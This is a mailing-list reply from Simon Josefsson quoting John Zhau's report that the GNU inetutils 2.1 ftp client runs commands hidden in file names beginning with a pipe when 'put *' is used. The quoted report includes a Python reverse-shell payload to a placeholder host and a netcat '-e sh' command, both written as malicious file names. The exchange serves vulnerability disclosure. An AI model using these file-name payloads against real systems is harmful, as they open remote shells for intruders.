Re: FTP client arbitrary code execution

[Simon Josefsson]

John Zhau <johnzhau0xnull@gmail.com> writes:

> After some further testing, I've found that I'm still able to get a shell
> with the aforementioned payload even with other files in the same
> directory. I've also found that I can also get a shell with the following
> file name:
>
> ```
> |nc 127.0.0.1 1337 -e sh
> ```
>
> As a result, I believe code execution is caused by having a `|` (pipe) at
> the beginning of the file name.

Hi.  Thanks for the report.  Are you sure this isn't intended behaviour?
There seems to be globbing support in the ftp client, to support
redirects like | and > from within the client.

/Simon

>
> Also, the version information is as follows.
>
> ```
> $ ftp --version
> ftp (GNU inetutils) 2.1
> Copyright (C) 2021 Free Software Foundation, Inc.
> License GPLv3+: GNU GPL version 3 or later <
> https://gnu.org/licenses/gpl.html>.
> This is free software: you are free to change and redistribute it.
> There is NO WARRANTY, to the extent permitted by law.
>
> Written by many authors.
> ```
>
> On Sun, Sep 19, 2021 at 7:04 PM John Zhau <johnzhau0xnull@gmail.com> wrote:
>
>> I've found that with a certain file name, `ftp` executes code in the file
>> name. The file is created with the following command
>>
>> ```
>> touch "|python3 -c 'import
>> os,pty,socket;s=socket.socket();s.connect((\"YOUR_IP\",YOUR_PORT));[os.dup2(s.fileno(),f)for
>> f in(0,1,2)];pty.spawn(\"sh\")';echo .csv"
>> ```
>>
>> To get code to execute, simply have the file in the current directory
>> (haven't tested with multiple files in the directory) and run `put *` to
>> upload everything.
>>
>> This bug was found while I was doing a CTF (capture the flag) challenge
>> and I haven't been able to connect to the same server since for further
>> testing.
>>

signature.asc
Description: PGP signature